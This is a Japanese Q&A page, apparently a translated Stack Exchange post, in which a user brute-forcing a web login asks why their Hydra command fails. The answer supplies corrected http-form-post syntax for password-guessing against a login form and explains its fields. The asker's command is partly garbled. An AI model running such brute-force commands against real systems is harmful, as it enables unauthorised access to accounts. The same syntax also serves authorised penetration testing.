web-dev-qa-db-ja.com

ヒドラを使用したブルートフォーシング

私はシステムに対してブルートフォース攻撃を試みており、考えられるパスワードの完全なWordリストを持っています。これらのパスワードは非常に単純な形式を使用しているためですが、次の投稿応答でヒドラを試したところ、エラーメッセージが表示されました。

Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-19 22:02:39 [ERROR] Wrong syntax, requires three arguments separated by a colon which may not be null: /Connect/Login.aspx

これを修正する方法はありますか?

hydra -l A23432 -P wordlist_1.txt -s 80 -V 0.0.0.0 http-post-form "/Connect/Login.aspx:__EVENTTARGET=&__EVENTARGUMENT☞ b3vnFcneVi-Yc52SWRk3vuSeeDAj6xlnRF9h5rqjDrO5hURRKbSQ_cRyvIHbRX7ss3b0&__ EVENTVALIDATION =%2FwEWCQLqlo7JBQKVjO6OBwLzw%2BOgBQLA%2FraSCQKd2bA2ApyI9v8JAv2ao%2BgDAqebmbQDAujk6qkJVYCk1DwUcL4617gtTeSpx0D105E%3D&ctl00% 24ContentArea%24txtUserName = ^ USER ^&ctl00%24ContentArea%24txtPassword = ^ PASS ^&ctl00%24ContentArea%24btnLogin = Login:無効なパスワード

1
user3501673

正しい構文を指定する必要があります。次に例を示します。

hydra [TARGETIP] http-form-post "/TARGETPATH/TARGETPAGE.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
  • 最初のフィールド(最初のコロンの前)=ターゲットページの場所
  • 2番目のフィールド(2番目のコロンの前)=ユーザーとパスワードのパラメーター
  • 3番目のフィールド(2番目のコロンの後)=正しくないログイン試行時のページ応答